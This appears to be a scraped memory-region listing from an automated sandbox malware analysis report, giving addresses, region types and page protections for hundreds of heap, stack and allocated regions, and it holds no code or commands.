|
||
|
7500000
|
heap
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
F60000
|
unkown
|
page readonly
|
||
|
3490000
|
heap
|
page read and write
|
||
|
82EE000
|
stack
|
page read and write
|
||
|
2283C000
|
stack
|
page read and write
|
||
|
FF0000
|
unkown
|
page readonly
|
||
|
3B7C000
|
unclassified section
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
288C000
|
stack
|
page read and write
|
||
|
2C20000
|
heap
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3A62000
|
unclassified section
|
page read and write
|
||
|
D80000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
5E4000
|
unkown
|
page execute read
|
||
|
2370000
|
heap
|
page read and write
|
||
|
31B9000
|
heap
|
page read and write
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
5903000
|
system
|
page execute and read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
2B90000
|
trusted library section
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
DE89000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
44D000
|
unkown
|
page read and write
|
||
|
9889000
|
direct allocation
|
page execute and read and write
|
||
|
70C2000
|
heap
|
page read and write
|
||
|
7260000
|
heap
|
page execute and read and write
|
||
|
2294A000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E8000
|
unkown
|
page execute read
|
||
|
6D90000
|
heap
|
page read and write
|
||
|
5D5000
|
heap
|
page read and write
|
||
|
6FD4000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
3153000
|
heap
|
page read and write
|
||
|
439000
|
unkown
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
1891000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
E10000
|
unkown
|
page readonly
|
||
|
8EF000
|
stack
|
page read and write
|
||
|
8A9F000
|
stack
|
page read and write
|
||
|
2C15000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8D00000
|
direct allocation
|
page execute and read and write
|
||
|
1AD0000
|
unkown
|
page readonly
|
||
|
30F9000
|
heap
|
page read and write
|
||
|
31AF000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
28BF000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
15D0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
4124000
|
unclassified section
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
74B0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED58AB000
|
trusted library allocation
|
page read and write
|
||
|
5A0B000
|
trusted library allocation
|
page read and write
|
||
|
6D97000
|
heap
|
page read and write
|
||
|
39C0000
|
heap
|
page read and write
|
||
|
18D0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
FC0000
|
unkown
|
page read and write
|
||
|
2E8E000
|
unkown
|
page read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
6F10000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
22ED5703000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22430000
|
heap
|
page read and write
|
||
|
2BBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
225E000
|
stack
|
page read and write
|
||
|
6FBC000
|
heap
|
page read and write
|
||
|
3A52000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22F71000
|
direct allocation
|
page execute and read and write
|
||
|
3839000
|
direct allocation
|
page execute and read and write
|
||
|
75FA000
|
heap
|
page read and write
|
||
|
2EF4000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22AF8000
|
heap
|
page read and write
|
||
|
8FF7000
|
trusted library allocation
|
page read and write
|
||
|
5C0F000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
58AF000
|
system
|
page execute and read and write
|
||
|
8046000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
7050000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
293D000
|
stack
|
page read and write
|
||
|
30E9000
|
heap
|
page read and write
|
||
|
FC0000
|
unkown
|
page read and write
|
||
|
22ED3B30000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
58AC000
|
system
|
page execute and read and write
|
||
|
6DDF000
|
stack
|
page read and write
|
||
|
223FD000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
74AC000
|
stack
|
page read and write
|
||
|
22ED5600000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
226EE000
|
stack
|
page read and write
|
||
|
8296000
|
heap
|
page read and write
|
||
|
1007000
|
unkown
|
page readonly
|
||
|
C089000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
10F8000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
DF0000
|
unkown
|
page readonly
|
||
|
6FCE000
|
heap
|
page read and write
|
||
|
6FA8000
|
heap
|
page read and write
|
||
|
FD0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2C5F000
|
heap
|
page read and write
|
||
|
3165000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
FF1000
|
unkown
|
page execute read
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
30EB000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
53E9000
|
remote allocation
|
page execute and read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
71000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6FAA000
|
heap
|
page read and write
|
||
|
6C70000
|
direct allocation
|
page read and write
|
||
|
3194000
|
heap
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
6FBC000
|
heap
|
page read and write
|
||
|
39E1000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
2375000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
13A0C000
|
system
|
page read and write
|
||
|
6B95000
|
heap
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2ABE000
|
unkown
|
page read and write
|
||
|
1007000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2B80000
|
trusted library section
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
5DE9000
|
remote allocation
|
page execute and read and write
|
||
|
3144000
|
heap
|
page read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
22ED53D0000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
heap
|
page read and write
|
||
|
1005000
|
unkown
|
page read and write
|
||
|
2237E000
|
stack
|
page read and write
|
||
|
F50000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
22ED39B8000
|
system
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6FB9000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
36AD000
|
unkown
|
page execute and read and write
|
||
|
808E000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
5B4A000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
35CE000
|
unkown
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
27BF000
|
stack
|
page read and write
|
||
|
29EF000
|
stack
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
D489000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6FB8000
|
heap
|
page read and write
|
||
|
314E000
|
heap
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
DF0000
|
unkown
|
page readonly
|
||
|
8ADE000
|
stack
|
page read and write
|
||
|
436000
|
unkown
|
page read and write
|
||
|
7554000
|
heap
|
page read and write
|
||
|
31A9000
|
heap
|
page read and write
|
||
|
317D000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22980000
|
direct allocation
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
D80000
|
unkown
|
page readonly
|
||
|
2EE0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2BB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
8041000
|
heap
|
page read and write
|
||
|
3FE9000
|
remote allocation
|
page execute and read and write
|
||
|
7590000
|
heap
|
page read and write
|
||
|
6FB8000
|
heap
|
page read and write
|
||
|
139B2000
|
system
|
page read and write
|
||
|
58A0000
|
system
|
page execute and read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
8055000
|
heap
|
page read and write
|
||
|
2BC0000
|
trusted library allocation
|
page read and write
|
||
|
18D0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
81A0000
|
heap
|
page read and write
|
||
|
8040000
|
heap
|
page read and write
|
||
|
7520000
|
heap
|
page read and write
|
||
|
10002000
|
unkown
|
page readonly
|
||
|
67E9000
|
remote allocation
|
page execute and read and write
|
||
|
6ED0000
|
direct allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
1500000
|
unkown
|
page readonly
|
||
|
34B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
3153000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
F40000
|
unkown
|
page readonly
|
||
|
6F00000
|
direct allocation
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8BDF000
|
stack
|
page read and write
|
||
|
DBC000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
23630000
|
unclassified section
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22670000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
FFE000
|
unkown
|
page readonly
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
E0A000
|
stack
|
page read and write
|
||
|
FF1000
|
unkown
|
page execute read
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
223BE000
|
stack
|
page read and write
|
||
|
6E90000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
626000
|
unkown
|
page execute read
|
||
|
8E89000
|
direct allocation
|
page execute and read and write
|
||
|
807B000
|
heap
|
page read and write
|
||
|
22690000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
368D000
|
heap
|
page read and write
|
||
|
17D0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
1700000
|
unkown
|
page read and write
|
||
|
39DD000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
17D8000
|
heap
|
page read and write
|
||
|
3640000
|
unkown
|
page execute and read and write
|
||
|
30F2000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
4D125FF000
|
stack
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
6F40000
|
heap
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
2E97000
|
heap
|
page read and write
|
||
|
F40000
|
unkown
|
page readonly
|
||
|
8069000
|
heap
|
page read and write
|
||
|
22ED53D0000
|
trusted library allocation
|
page read and write
|
||
|
52D1000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
69DE000
|
stack
|
page read and write
|
||
|
10003000
|
unkown
|
page read and write
|
||
|
22940000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED58CE000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
heap
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
30A0000
|
trusted library allocation
|
page read and write
|
||
|
358D000
|
stack
|
page read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
6BA0000
|
direct allocation
|
page read and write
|
||
|
383D000
|
direct allocation
|
page execute and read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
22980000
|
direct allocation
|
page read and write
|
||
|
22C25000
|
heap
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
22ED570A000
|
trusted library allocation
|
page read and write
|
||
|
4AE000
|
stack
|
page read and write
|
||
|
8050000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2D4F000
|
stack
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED3BF8000
|
heap
|
page read and write
|
||
|
22C21000
|
heap
|
page read and write
|
||
|
11EF000
|
unkown
|
page read and write
|
||
|
649000
|
unkown
|
page execute read
|
||
|
6FBC000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
7FA7000
|
stack
|
page read and write
|
||
|
2CF8000
|
stack
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
2260C000
|
stack
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page read and write
|
||
|
802E000
|
stack
|
page read and write
|
||
|
832E000
|
stack
|
page read and write
|
||
|
5F0000
|
unkown
|
page execute read
|
||
|
110B000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8254000
|
heap
|
page read and write
|
||
|
FFE000
|
unkown
|
page readonly
|
||
|
2CE3000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
6FC9000
|
heap
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
380F000
|
stack
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
1005000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6EF0000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
131B000
|
unkown
|
page read and write
|
||
|
30E2000
|
unkown
|
page read and write
|
||
|
F50000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
CA89000
|
direct allocation
|
page execute and read and write
|
||
|
2CD5000
|
heap
|
page read and write
|
||
|
2DB8000
|
trusted library allocation
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
6A9E000
|
stack
|
page read and write
|
||
|
E30000
|
unkown
|
page read and write
|
||
|
2264D000
|
stack
|
page read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
2BA0000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
5887000
|
system
|
page execute and read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
6BD0000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
30FA000
|
heap
|
page read and write
|
||
|
229EE000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
30A0000
|
trusted library allocation
|
page read and write
|
||
|
22ED3B70000
|
heap
|
page read and write
|
||
|
6F20000
|
direct allocation
|
page read and write
|
||
|
22ED570E000
|
trusted library allocation
|
page read and write
|
||
|
8050000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3103000
|
heap
|
page read and write
|
||
|
8064000
|
heap
|
page read and write
|
||
|
31FC000
|
unkown
|
page read and write
|
||
|
4A03000
|
trusted library allocation
|
page read and write
|
||
|
22ED3960000
|
system
|
page execute and read and write
|
||
|
225CF000
|
stack
|
page read and write
|
||
|
7080000
|
direct allocation
|
page read and write
|
||
|
899F000
|
stack
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
22F6D000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8081000
|
heap
|
page read and write
|
||
|
30E2000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7613000
|
heap
|
page read and write
|
||
|
370E000
|
stack
|
page read and write
|
||
|
17D0000
|
heap
|
page read and write
|
||
|
15D0000
|
unkown
|
page readonly
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
30FA000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6EA1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2258E000
|
stack
|
page read and write
|
||
|
16BF000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
22ED3BF0000
|
heap
|
page read and write
|
||
|
22ED3C1B000
|
heap
|
page read and write
|
||
|
2BC9000
|
trusted library allocation
|
page read and write
|
||
|
1005000
|
unkown
|
page read and write
|
||
|
49E9000
|
remote allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
FD1000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7070000
|
direct allocation
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6FD4000
|
heap
|
page read and write
|
||
|
10F8000
|
heap
|
page read and write
|
||
|
22ED58BE000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
75F5000
|
heap
|
page read and write
|
||
|
37A4000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33BD000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2F04000
|
heap
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
2EB8000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7537000
|
heap
|
page read and write
|
||
|
5B50000
|
trusted library allocation
|
page read and write
|
||
|
6C60000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1700000
|
unkown
|
page read and write
|
||
|
92E000
|
stack
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
7F910000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
2F10000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2CD8000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
15F0000
|
heap
|
page read and write
|
||
|
22ED5801000
|
trusted library allocation
|
page read and write
|
||
|
71B7000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7605000
|
heap
|
page read and write
|
||
|
6F30000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED3C20000
|
heap
|
page read and write
|
||
|
30EF000
|
heap
|
page read and write
|
||
|
F70000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
75BF000
|
heap
|
page read and write
|
||
|
7598000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
29CB000
|
stack
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page execute and read and write
|
||
|
D90000
|
unkown
|
page readonly
|
||
|
2960000
|
heap
|
page read and write
|
||
|
28BD000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2340000
|
heap
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
FF0000
|
unkown
|
page readonly
|
||
|
A289000
|
direct allocation
|
page execute and read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
316C000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
4F7000
|
heap
|
page read and write
|
||
|
8058000
|
heap
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
2CDD000
|
heap
|
page read and write
|
||
|
826C000
|
stack
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
5EA000
|
unkown
|
page execute read
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2293C000
|
stack
|
page read and write
|
||
|
22ED3C0C000
|
heap
|
page read and write
|
||
|
1590000
|
unkown
|
page read and write
|
||
|
6C60000
|
direct allocation
|
page read and write
|
||
|
2F10000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
4D115FE000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3B22000
|
unclassified section
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
5A0C000
|
stack
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
22A0A000
|
heap
|
page read and write
|
||
|
B689000
|
direct allocation
|
page execute and read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6D95000
|
heap
|
page read and write
|
||
|
22ED5712000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2DAF000
|
stack
|
page read and write
|
||
|
2F04000
|
heap
|
page read and write
|
||
|
2304000
|
heap
|
page read and write
|
||
|
5EC000
|
unkown
|
page execute read
|
||
|
2369D000
|
unclassified section
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3144000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED3A50000
|
heap
|
page read and write
|
||
|
70A0000
|
heap
|
page read and write
|
||
|
F60000
|
unkown
|
page readonly
|
||
|
1500000
|
unkown
|
page readonly
|
||
|
2C10000
|
heap
|
page execute and read and write
|
||
|
22980000
|
direct allocation
|
page read and write
|
||
|
5890000
|
system
|
page execute and read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
1192000
|
heap
|
page read and write
|
||
|
756E000
|
heap
|
page read and write
|
||
|
6EB0000
|
direct allocation
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
1890000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2EE0000
|
unkown
|
page readonly
|
||
|
6F6C000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
FFE000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
10000000
|
unkown
|
page readonly
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
5F2000
|
unkown
|
page execute read
|
||
|
2C6C000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3165000
|
heap
|
page read and write
|
||
|
CBA000
|
stack
|
page read and write
|
||
|
4B7000
|
heap
|
page read and write
|
||
|
31A2000
|
unkown
|
page read and write
|
||
|
17D8000
|
heap
|
page read and write
|
||
|
2BFB000
|
heap
|
page read and write
|
||
|
22ED58C4000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
FE0000
|
unkown
|
page read and write
|
||
|
3182000
|
heap
|
page read and write
|
||
|
823D000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
52D7000
|
trusted library allocation
|
page read and write
|
||
|
8030000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
CBA000
|
stack
|
page read and write
|
||
|
6FC5000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
59A1000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
5E6000
|
unkown
|
page execute read
|
||
|
4FD000
|
heap
|
page read and write
|
||
|
5B0F000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6B90000
|
heap
|
page execute and read and write
|
||
|
8560000
|
direct allocation
|
page execute and read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
30A0000
|
trusted library allocation
|
page read and write
|
||
|
2D2E000
|
stack
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
There are 869 hidden memdumps, click here to show them.